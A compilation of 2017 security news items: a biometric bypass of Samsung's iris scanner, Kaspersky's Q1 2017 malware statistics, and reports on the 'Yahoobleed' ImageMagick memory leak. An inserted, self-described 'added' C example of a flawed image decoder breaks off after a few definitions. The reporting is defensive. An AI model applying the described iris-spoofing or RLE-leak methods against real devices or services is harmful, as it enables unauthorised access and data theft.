“The easiest way for a thief to capture iris pictures is with a digital camera in night-shot mode or the infrared filter removed. In the infrared light spectrum – usually filtered in cameras – the fine, normally hard to distinguish details of the iris of dark eyes are well recognizable.” continues the post. “Starbug was able to demonstrate that a good digital camera with 200mm-lens at a distance of up to five meters is sufficient to capture suitably good pictures to fool iris recognition systems.”

The researchers explained that they quickly found a way to defeat the recognition system implemented by Samsung: a single day of experiments was enough to bypass it.

“About a day of experimenting until the idea came up do use a contact lens. Then, a little charade of printers until it turned out that the Samsung printer provided the most reliable prints,” Neumann told Motherboard.


This isn’t the first time experts at CCC have bypassed biometric locks on smartphones. The first proof-of-concept attack of this kind was presented at Germany’s Chaos Computer Club in 2013 against the iPhone 5s, and in 2014 the German researcher Jan Krissler, aka Starbug, demonstrated at the same hacking conference how to bypass fingerprint biometrics using only a few photographs.

In March, YouTube vlogger iDeviceHelp posted a video on his channel in which the user Marcianotech demonstrated how to unlock a Samsung Galaxy S8 or Galaxy S8 Plus by taking the device owner’s picture from Facebook and presenting the image to the locked phone.

Let’s wait for Samsung’s reply.


IT threat evolution Q1 2017. Statistics
23.5.2017 Kaspersky Analysis

According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world.

79,209,775 unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers.

Crypto ransomware attacks were blocked on 240,799 computers of unique users.

Kaspersky Lab’s file antivirus detected a total of 174,989,956 unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

1,333,605 malicious installation packages;
32,038 mobile banker Trojans (installation packages);
218,625 mobile ransomware Trojans (installation packages).
Mobile threats

Q1 events

The rise of Trojan-Ransom.AndroidOS.Egat

In the first quarter of 2017, we registered a dramatic growth in attacks involving mobile ransomware from the Trojan-Ransom.AndroidOS.Egat family: the number of users attacked by this type of malware increased more than 13 times from the previous quarter. Despite this Trojan being known to us since June 2016, such an explosive increase in the number of attacks has only occurred now.

This malware has standard mobile ransomware functionality: it blocks the device, overlays all open windows with its own window, then demands money to unblock the device. In most cases, the ransom amount fluctuates between $100 and $200. Most of the attacked users were in Europe, mainly Germany, the UK and Italy.

Revamped ZTorg

We managed to detect around 30 new Trojans from the Ztorg family in the official Google Play Store. To recap, this is the family that gave us infected fake guides for Pokémon GO. It was discovered in Google Play in the summer of 2016 and was installed more than 500,000 times. After installation, Ztorg checks to make sure it isn’t running on a virtual machine. If the check is passed smoothly, the main module is loaded from a remote server. By exploiting a vulnerability in the system, the Trojan tries to gain superuser privileges. If successful, it installs its modules into the system folders and also modifies the device settings so that it remains there – even after a reset to factory settings.


Trojan.AndroidOS.Ztorg.bp in the official Google Play Store

The Trojan uses several different modules that secretly download and install various programs on the device, display ads and even buy apps. It should be noted that the functionality of this malware has changed a bit: the number of checks to verify whether the device is real has decreased; the code for downloading, decrypting and loading the main module has been placed in a downloaded library.

Asacub awakens

In the first quarter of 2017, we noted that the Trojan-Banker.AndroidOS.Asacub mobile banker was actively spreading. Over three months, the representatives of this family attacked more than 43,000 mobile devices, which was 2.5 times more than in the previous quarter. Over 97% of all attacked users were in Russia. Asacub was mainly distributed via SMS spam. After clicking a malicious link, users were directed to a page where they were prompted to view an MMS that concealed the Trojan, which was then downloaded to the device. Interestingly, if the same link was opened on a Windows device, Backdoor.Win32.Htbot.bs was downloaded.


The site from which Trojan-Banker.AndroidOS.Asacub was downloaded

It’s worth noting that Trojan-Banker.AndroidOS.Asacub is constantly expanding its spyware functionality. In addition to the standard mobile banker features, such as stealing and sending text messages, or overlaying various applications with phishing windows, this Trojan hunts for the user’s call history, contacts and GPS location.

Mobile threat statistics

In the first quarter of 2017, Kaspersky Lab detected 1,333,605 malicious installation packages, which is almost as many as in Q4 2016.


Number of detected malicious installation packages (Q2 2016 – Q1 2017)

Distribution of mobile malware by type


Distribution of new mobile malware by type (Q4 2016 and Q1 2017)

In Q1 2017, the biggest change was in Trojan-Ransom: its share increased from 4.64% to 16.42%, that is 3.5 times. The most rapid growth in the number of installation packages was demonstrated by the Trojan-Ransom.AndroidOS.Congur family, which is described below.

Trojan-Spy came second in terms of growth rate: its proportion reached 10.27% (+1.83%). This was caused by an increase in the number of malicious programs from the Trojan-Spy.AndroidOS.SmForw and Trojan-Spy.AndroidOS.SmsThief families, which are designed to steal SMS messages.

In the first quarter, the biggest decline was demonstrated by Adware (7.32%) and Trojan-Dropper (6.99%) – their shares decreased by 4.99% and 4.48% respectively. In addition, the contribution of unwanted RiskTool programs dropped by 2.55%.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

In Q1 of 2017, 14 Trojans that use advertising as their main means of monetization made it into the TOP 20. Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which they are very difficult to delete.

Name % of attacked users *
1 DangerousObject.Multi.Generic 70.09
2 Trojan.AndroidOS.Hiddad.an 9.35
3 Trojan.AndroidOS.Boogr.gsh 4.51
4 Backdoor.AndroidOS.Ztorg.c 4.18
5 Trojan.AndroidOS.Sivu.c 4.00
6 Backdoor.AndroidOS.Ztorg.a 3.98
7 Trojan.AndroidOS.Hiddad.v 3.89
8 Trojan-Dropper.AndroidOS.Hqwar.i 3.83
9 Trojan.AndroidOS.Hiddad.pac 2.98
10 Trojan.AndroidOS.Triada.pac 2.90
11 Trojan.AndroidOS.Iop.c 2.60
12 Trojan-Banker.AndroidOS.Svpeng.q 2.49
13 Trojan.AndroidOS.Ztorg.ag 2.34
14 Trojan.AndroidOS.Ztorg.aa 2.03
15 Trojan.AndroidOS.Agent.eb 1.81
16 Trojan.AndroidOS.Agent.bw 1.79
17 Trojan.AndroidOS.Loki.d 1.76
18 Trojan.AndroidOS.Ztorg.ak 1.67
19 Trojan-Downloader.AndroidOS.Agent.bf 1.59
20 Trojan-Dropper.AndroidOS.Agent.cv 1.54
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place was occupied by DangerousObject.Multi.Generic (70.09%), the verdict used for malicious programs detected using cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

Trojan.AndroidOS.Hiddad.an (9.35%) was second. This piece of malware imitates different popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to resist removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts; its main “audience” is in Russia (86% of attacked users).

Third came Trojan.AndroidOS.Boogr.gsh (4.51%). This verdict is issued for files recognized as malicious by our machine-learning system. Although this system can detect any type of malware, in Q1 2017 the most common detections were advertising Trojans that used superuser privileges.

Eighth position in the ranking was occupied by Trojan-Dropper.AndroidOS.Hqwar.i (3.83%), the verdict used for the Trojans protected by a certain packer/obfuscator. In most cases, this name hides the representatives of the FakeToken and Svpeng mobile banking families.

The ranking also included Trojan-Banker.AndroidOS.Svpeng (2.49%), which was twelfth in the Top 20. This family has been active for three quarters in a row and remains the most popular banking Trojan in Q1 of 2017.

Trojan.AndroidOS.Agent.bw was sixteenth in the rating (1.79%). This Trojan, targeting primarily people in India (more than 92% of attacked users), just like Trojan.AndroidOS.Hiddad.an imitates popular programs and games, and once run, downloads and installs various applications from the fraudsters’ server.

The geography of mobile threats

The geography of attempted mobile malware infections in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked **
1 Iran 47.35
2 Bangladesh 36.25
3 Indonesia 32.97
4 China 32.47
5 Nepal 29.90
6 India 29.09
7 Algeria 28.64
8 Philippines 27.98
9 Nigeria 27.81
10 Ghana 25.85
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q1 2017, Iran was the country with the highest percentage of users attacked by mobile malware – 47.35%. Bangladesh came second: 36.25% of users there encountered a mobile threat at least once during the quarter. It was followed by Indonesia and China; the share of both countries was slightly over 32%.

Russia (11.6%) came 40th in this rating, France (8.1%) 57th, Italy (7.1%) 66th, the US (6.9%) 69th, Germany (6.2%) 72nd and Britain (5.8%) 75th.

The safest countries were Finland (2.7%), Georgia (2.5%) and Japan (1.5%).

In all the countries of the Top 20, the same mobile objects are detected – adware, first of all representatives of the AdWare.AndroidOS.Ewind family, as well as advertising Trojans.

Mobile banking Trojans

Over the reporting period, we detected 32,038 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q4 2016.


Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q2 2016 – Q1 2017)

Trojan-Banker.AndroidOS.Svpeng remained the most popular mobile banking Trojan for the third quarter in a row. This family of mobile banking Trojans uses phishing windows to steal credit card data and logins and passwords from online banking accounts. In addition, fraudsters steal money via SMS services, including mobile banking. Svpeng is followed by the Trojans Trojan-Banker.AndroidOS.Faketoken.z and Trojan-Banker.AndroidOS.Asacub.san. It is worth noting that most of the attacked users were in Russia.


Geography of mobile banking threats in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked**
1 Russia 1.64
2 Australia 1.14
3 Turkey 0.81
4 Uzbekistan 0.61
5 Tajikistan 0.48
6 Moldova 0.43
7 Ukraine 0.41
8 Kazakhstan 0.37
9 Kyrgyzstan 0.32
10 Singapore 0.26
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

Although the Svpeng family topped the rating of the most popular mobile banking Trojans in the first quarter of 2017, its activity declined compared to the third quarter of 2016: the share of users attacked by these malicious programs in Russia dropped almost twofold – from 3.12% to 1.64%. At the same time, Russia remained the leader of the rating.

In second place was Australia (1.14%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats. Turkey (0.81%) rounded off the Top 3.

Mobile Ransomware

In Q1 2017, we detected 218,625 mobile Trojan-Ransomware installation packages, which is 3.5 times more than in the previous quarter.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q2 2016 – Q1 2017)

In the first half of 2016, we saw an increase in the number of mobile ransomware installation packages caused by the active spread of the Trojan-Ransom.AndroidOS.Fusob family. In the second half of the same year, the activity of this family fell, which affected the number of detected installation packages. Growth resumed in the fourth quarter of 2016 and sharply accelerated in Q1 2017. The reason was the Trojan-Ransom.AndroidOS.Congur family – more than 86% of detected mobile ransomware installation packages belonged to this family. Representatives of Congur usually have very simple functionality – they change the system password (PIN), or set one if no password was set earlier, thus making it impossible to use the device, and then ask the user to contact the fraudsters via the QQ messenger to unblock it. It is worth noting that there are modifications of this Trojan that can take advantage of existing superuser privileges to install their module into the system folder.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the first quarter, accounting for nearly 45% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and downloads the data to a malicious server. After that, it may receive a command to block the device.

Geography of mobile Trojan-Ransomware in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Country* % of users attacked**
1 USA 1.23
2 Uzbekistan 0.65
3 Canada 0.56
4 Kazakhstan 0.54
5 Italy 0.44
6 Germany 0.37
7 Korea 0.35
8 Denmark 0.30
9 United Kingdom 0.29
10 Spain 0.28
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

The US topped the ranking of ten countries attacked by mobile Trojan-Ransomware; the most popular family there was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of $100-500 from victims to unblock their devices.

In Uzbekistan (0.65%), which came second, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Loluz.a. This is a simple Trojan that blocks operation of the device with its own window and asks the user to contact the fraudsters by phone to unblock it.

Fourth place was occupied by Kazakhstan (0.54%). The main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demanding $10 to unblock it.

In all other countries of the TOP 10, the most popular Trojan-Ransom family was Fusob.

Vulnerable apps exploited by cybercriminals

The first quarter of 2017 was marked by the return, in a diminished form, of the exploit kit Neutrino, which had departed the cybercriminal market in the third quarter. Following Magnitude, Neutrino is changing its distribution format and abandoning wide-scale campaigns to become a “private” exploit kit. Several new players – Nebula, Terror and others – tried to fill the vacant niche but failed: after a brief burst of activity their distribution quickly came to naught. At the moment, RIG and its modifications remain the most popular and advanced public exploit kit.

The Q1 statistics show an almost 10% decline in the number of attacked users. This is primarily caused by the weak exploit kit environment, as well as the decrease in the effectiveness of exploits in general. Adobe Flash remained the only platform that demonstrated growth: although no new vulnerabilities for it had been discovered, the number of attacked users grew by 20%. The biggest decrease fell on exploits for browsers – only 44% of attacks targeted them (against 54% in the previous quarter).

CVE-2016-0189, CVE-2014-6332 and CVE-2013-2551 remained the most popular vulnerabilities in the first quarter. Also of note were vulnerabilities in the Microsoft Edge Chakra engine, published openly in early 2017. In addition to a detailed description of the vulnerabilities, the research included a ready-to-use proof of concept, which shortly after publication was integrated into the Sundown exploit kit, from which it moved to Neutrino, Kaixin and others. However, exploitation of these vulnerabilities was not reliable enough, and patches for them had been released as far back as November along with the MS16-129 update, so they have not become widespread and are now almost out of use.


Distribution of exploits used in attacks by the type of application attacked, Q1 2017

In Q1 2017, especially popular were campaigns involving mass mailings of infected documents – to distribute them, Microsoft Office exploits were used. Although the share of attacked office package users has not changed much, the same users were attacked several times – on average, one attacked user received 3 malicious documents over the quarter.

The general trend is towards an increase in the share of social engineering when delivering malware to the computer of a potential victim. Campaigns involving the distribution of infected messages are always based on getting the user to perform certain actions: unpack a file from a password-protected archive, grant permission to execute macros in a document, etc. This method is now beginning to be applied in exploits for browsers as well. Magnitude, for example, prompts Internet Explorer 11 and Windows 10 users to download a malicious file under the guise of an antivirus update for Microsoft Defender. Some spam campaigns are based on imitating the Google Chrome update page. We believe that this trend will continue in the future – such campaigns are easier to maintain and implement, and their level of “penetration” is constantly growing.

Online threats (Web-based attacks)

Online threats in the banking sector

These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning with the first quarter of 2017, the statistics include malicious programs for ATMs and POS terminals but do not include mobile threats.

Kaspersky Lab solutions blocked attempts to launch one or several malicious programs capable of stealing money via online banking on 288,000 computers in Q1 2017.


Number of users attacked by financial malware, January – March 2017

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.


Geography of banking malware attacks in Q1 2017 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of attacked users **
1 Germany 1.70
2 China 1.37
3 Libya 1.12
4 Kazakhstan 1.02
5 Palestine 0.92
6 Togo 0.91
7 Tunisia 0.89
8 Armenia 0.89
9 Venezuela 0.88
10 Taiwan 0.87
These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

*We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).

** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the first quarter of 2017, Germany (1.70%) had the highest proportion of users attacked by banking Trojans. It was followed by China (1.37%). Libya (1.12%) rounded off the Top 3.

Among the other European countries in the Q1 rating, Spain (0.24%), for example, was in 89th position and the UK (0.15%) came 126th.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q3 2016 to attack online banking users (as a percentage of users attacked):

Name* % of attacked users**
1 Trojan-Spy.Win32.Zbot 45.93
2 Trojan.Win32.Nymaim 29.70
3 Trojan.Win32.Neurevt 3.31
4 Trojan-Banker.Win32.Gozi 3.15
5 Trojan-Spy.Win32.SpyEyes 2.71
6 Backdoor.Win32.ZAccess 2.11
7 Backdoor.Win32.Shiz 1.67
8 Trojan.Multi.Capper 1.67
9 Trojan.Win32.Tinba 1.00
10 Trojan.Win32.Shifu 1.00
*The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

As last year, Trojan-Spy.Win32.Zbot (45.93%) topped the rating of the most popular malware families in Q1 2017. Its source code has been publicly available since a leak and is now widely exploited as an easy-to-use tool for stealing user payment data. Unsurprisingly, this malware consistently tops this rating – cybercriminals regularly enhance the family with new modifications compiled on the basis of the source code and containing minor differences from the original.

Second came Trojan.Win32.Nymaim (29.70%). The first modifications of malware belonging to this Trojan family were downloaders, which blocked the infected machine with the help of downloaded programs unique to each country. Later, new modifications of the Trojan.Win32.Nymaim family were discovered. They included a fragment of Gozi used by cybercriminals to steal user payment data in online banking systems. In Q1 2017, Gozi (3.15%) was in 4th position in the rating.

Trojan.Win32.Neurevt (3.31%) rounded off the Top 3. It is a multifunctional Trojan written in C++. It uses rootkit technologies to conceal its presence in the system, injects its own code into all running processes, blocks the operation of some anti-virus programs, and can monitor and block the installation of other common Trojans.

Ransomware Trojans

A total of 11 new cryptor families and 55,679 new modifications were detected in Q1 2017.

The number of newly created cryptor modifications, Q2 2016 – Q1 2017

Most of detected modifications belonged to the Cerber family (the Trojan-Ransom.Win32.Zerber verdict). This cryptor, first discovered a year ago, continues to evolve, and we regularly detect its new improved versions.

The number of users attacked by ransomware

In Q1 2017, 240,799 unique KSN users were attacked by cryptors.


Number of unique users attacked by Trojan-Ransom cryptor malware (Q1 2017)

This figure is almost half that of the fourth quarter of 2016, but one should not consider it a receding threat. It is most likely that this difference is related to the methodology while the actual number of incidents is higher: the statistics only reflect the results of signature-based and heuristic detection, whereas most Trojan ransomware is detected by Kaspersky Lab products using behavioral methods that issue a generic verdict which does not distinguish between types of malware.

The geography of attacks


Geography of Trojan-Ransom attacks in Q1 2017 (percentage of attacked users)

Top 10 countries attacked by cryptors

Country* % of users attacked by cryptors **
1 Italy 1.87%
2 Brazil 1.07%
3 Japan 0.99%
4 Vietnam 0.74%
5 Netherlands 0.73%
6 Cambodia 0.70%
7 Uganda 0.66%
8 Philippines 0.65%
9 Venezuela 0.63%
10 Nigeria 0.60%
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

Italy, which was not in the Top 10 in the third quarter of 2016, took the lead in the Q1 ranking (1.87%). Second came Brazil (1.07%), a newcomer to the Top 10. This correlates with our observations indicating an increase in the number of Trojan ransomware programs targeting victims in Brazil. One example of such malicious software was Xpan, which we analyzed last year.

Japan (0.99%), which ranked first in the second and third quarters of 2016, moved two places down but still remains at the top of the rating.

Top 10 most widespread cryptor families

Name Verdict* % of attacked users**
1 Cerber Trojan-Ransom.Win32.Zerber 18.04%
2 Spora Trojan-Ransom.Win32.Spora 7.59%
3 Locky Trojan-Ransom.Win32.Locky 7.35%
4 Sage Trojan-Ransom.Win32.SageCrypt 3.44%
5 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 3.20%
6 Shade Trojan-Ransom.Win32.Shade 2.82%
7 (generic verdict) Trojan-Ransom.Win32.Gen 2.37%
8 Crysis/Dharma Trojan-Ransom.Win32.Crusis 2.30%
9 CryptoWall Trojan-Ransom.Win32.Cryptodef 2.25%
10 (generic verdict) Trojan-Ransom.Win32.Snocry 2.16%
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

The Cerber Trojan (18.04%) was the most widespread in terms of the number of attacked users in the first quarter of 2017. It is no wonder, considering the huge number of this cryptor’s modifications and its active distribution by fraudsters.

Spora (7.59%) was in second place. This new Trojan was first discovered in January 2017 and at the “dawn of its career” only attacked Russian-speaking victims. However, a few weeks after its detection Spora spread around the world and by the end of the first quarter entered the top three most popular cryptors. The third position was occupied by Locky (7.35%), which appeared about a year ago and has recently reduced its activity a little.

Yet another new Trojan is Sage (3.44%). Like Spora, it emerged in the first quarter of 2017 and came fourth in the Q1 rating. The remaining places went to our “old acquaintances”, which appeared in the reports for the previous quarters.

Of special note is the find of the quarter: the cryptor PetrWrap, which is used by cybercriminals for targeted attacks on organizations. Statistics show that this type of attack is gaining popularity.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2017, Kaspersky Lab solutions blocked 479,528,279 attacks launched from web resources located in 191 countries around the world. 79,209,775 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q1 2017

The Netherlands (38%) took the lead in the number of web attack sources. The United States (30%), which had topped this rating for several quarters in a row, dropped to second place, although its share remained almost unchanged from its 2016 figures. Germany (9%) rounded off the Top 3.

Russia (4%) and France (3%) were fourth and fifth respectively.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Algeria 37.67
2 Belarus 33.61
3 Tunisia 32.04
4 Ukraine 31.98
5 Kazakhstan 29.96
6 Azerbaijan 29.95
7 Albania 29.80
8 Bangladesh 29.51
9 Qatar 29.41
10 Armenia 29.02
11 Greece 28.21
12 Moldova 27.46
13 Venezuela 27.37
14 Kyrgyzstan 27.02
15 Vietnam 26.87
16 Russia 26.67
17 Morocco 25.65
18 Sri Lanka 25.42
19 Brazil 25.10
20 Serbia 24.18
These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.05% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.


Geography of malicious web attacks in Q1 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Luxembourg (14.4%), Germany (13.9%), Norway (13.83%), South Africa (12.5%), the United States (10.56%), Uganda (10.29%) and Japan (9.18%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2017, Kaspersky Lab’s file antivirus detected 174,989,956 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Yemen 54.84
2 Afghanistan 54.27
3 Uzbekistan 53.80
4 Tajikistan 51.32
5 Ethiopia 50.87
6 Djibouti 50.03
7 Algeria 49.38
8 Vietnam 49.15
9 Turkmenistan 48.39
10 Rwanda 47.57
11 Mongolia 47.25
12 Somalia 46.96
13 Syria 46.96
14 Bangladesh 46.64
15 Iraq 46.59
16 Sudan 46.35
17 Nepal 46.19
18 Kazakhstan 46.00
19 Laos 45.39
20 Belarus 43.45
These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

An average of 23.63% of computers globally faced at least one Malware-class local threat during the third quarter. Russia’s contribution to this rating accounted for 30.51%.


The safest countries in terms of local infection risks were: Poland (14.85%), Singapore (12.21%), Italy (13.30%), France (11.15%), Australia (10.51%), Great Britain (9.08%), Canada (8.66%), the Czech Republic (7.83%), the United States (7.57%), Denmark (6.35%), Japan (6.18%).


18-Byte ImageMagick Hack Could Have Leaked Images From Yahoo Mail Server
23.5.2017 thehackernews Hacking
After the discovery of a critical vulnerability that could have allowed hackers to view private Yahoo Mail images, Yahoo retired the image-processing library ImageMagick.
ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermark and tweak images. The tool is supported by PHP, Python, Ruby, Perl, C++ and many other programming languages.
This popular image-processing library made headlines last year with the discovery of the then zero-day vulnerability dubbed ImageTragick, which allowed hackers to execute malicious code on a web server by uploading a maliciously crafted image.
Now, just last week, security researcher Chris Evans demonstrated an 18-byte exploit to the public that could be used to cause Yahoo servers to leak other users' private Yahoo! Mail image attachments.
'Yahoobleed' Bug Leaks Images From Server Memory

The exploit abuses a security vulnerability in the ImageMagick library, which Evans dubbed "Yahoobleed #1" (YB1) because the flaw caused the service to bleed contents stored in server memory.
The vulnerability actually exists in the obscure RLE (Utah Raster Toolkit Run Length Encoded) image format.
To exploit the vulnerability, all an attacker needs to do is create a maliciously crafted RLE image, whose header is followed by an empty list of RLE protocol commands, and send it to the victim's email address, prompting the leakage of information.
To show how it is possible to compromise a Yahoo email account, Evans, as a proof-of-concept (PoC) demonstration, created a malicious image containing an 18-byte exploit and emailed it to himself as an attachment.
Once the attachment reached Yahoo's email servers, ImageMagick processed the image to generate thumbnails and previews, but due to Evans' exploit the library generated a corrupt image preview for the attachment.
Once this image attachment was clicked, it launched the image preview pane, causing the service to display portions of images that were still present in the server's memory instead of the original image.
"The resulting JPEG image served to my browser is based on uninitialized, or previously freed, memory content," Evans said.
Unlike Heartbleed and Cloudbleed, which were due to out-of-bounds reads of server-side memory, Evans said Yahoobleed makes use of uninitialized or previously freed memory content.
"The previous bleed vulnerabilities have typically been out-of-bounds reads, but this one is the use of uninitialized memory," Evans said. "An uninitialized image decode buffer is used as the basis for an image rendered back to the client."
"This leaks server-side memory. This type of vulnerability is fairly stealthy compared to an out-of-bounds read because the server will never crash. However, the leaked secrets will be limited to those present in freed heap chunks."
Yahoo Retires 'Buggy' ImageMagick Library
After Evans had submitted his 18-byte exploit code to Yahoo, the company decided to retire the ImageMagick library altogether, rather than fixing the issue.
Evans also warned of another version of Yahoobleed, dubbed Yahoobleed2, which was due to Yahoo's failure to install a critical patch released in January 2015. He said the flaws combined could allow attackers to obtain browser cookies, authentication tokens and private images belonging to Yahoo Mail users.
Evans was awarded a bug bounty payment of $14,000 -- $778 per byte of his exploit code -- by the tech giant, which decided to double the bounty to $28,000 after learning of Evans' intention to donate his reward to charity.
After Yahoo had been made aware of the issue, Evans reported the vulnerability to the ImageMagick team, who released ImageMagick version 7.0.5-1 two months ago with a fix for the issue.
Other widely used web services using the ImageMagick library are likely still vulnerable to the bug and are advised to apply the patches as soon as possible.


Yahoo Ditching ImageMagick Highlights Issues in Bug Responsibility Ecosystem

23.5.2017 securityweek Security
ImageMagick, an open source command line graphics file editor, has been retired by one of its major consumers: Yahoo. The product has been beset by flaws and bugs for several years, but this appears to have been one too many for Yahoo. Following discovery of a bleed vulnerability, Yahoo fixed it by retiring the product.

The flaw itself, discovered by researcher Chris Evans, was fixed by ImageMagick two months ago. Last week, however, he blogged about his discovery of its persistence at Yahoo. For Evans, it is symptomatic of a wider issue: vendor (ImageMagick) and consumer (in this case Yahoo) responsibility for upstream fixes.

ImageMagick (using his own fix) fixed the problem. Could or should it have done more to ensure that its consumers also applied that fix? Yahoo is (or was) a consumer. Could it or should it have done more to apply upstream fixes?

A solution, suggests Evans, is, "Probably less trivial than it sounds; both Box and Yahoo! appear to have been running old versions of ImageMagick with known vulnerabilities."

The vulnerability, exploited by Evans on Yahoo, provided "a way to slurp other users' private Yahoo! Mail image attachments from Yahoo servers." It was present in the RLE (Utah Raster Toolkit Run Length Encoded) image format. An attacker, writes Evans, "could simply create an RLE image that has header flags that do not request canvas initialization, followed by an empty list of RLE protocol commands. This will result in an uninitialized canvas being used as the result of the image decode."
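The uninitialized-canvas bug class described here and in the Yahoobleed article above, as an added C example that is neither ImageMagick's code nor Evans' proof of concept: a toy decoder whose header format (width, height, flags, background, then a run list) is constructed for illustration and is not the real Utah RLE grammar, and whose single reusable chunk stands in for a recycled heap allocation. The vulnerable decoder leaves canvas initialization to a header flag, so a file that sets no flag and carries no runs returns whatever the previous decode left behind; the hardened decoder initializes the canvas unconditionally.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy model of the bug class behind Yahoobleed #1 (added example, not
 * ImageMagick code). The image format is constructed for illustration: a
 * 4-byte header [width, height, flags, background] followed by run commands
 * [CMD_RUN, offset, length, value] ended by CMD_END. It is NOT the real Utah
 * RLE grammar; only the decoder's initialization logic mirrors the flaw. */
#define FLAG_CLEAR_CANVAS 0x01  /* header bit: "fill the background first" */
#define CMD_END 0x00
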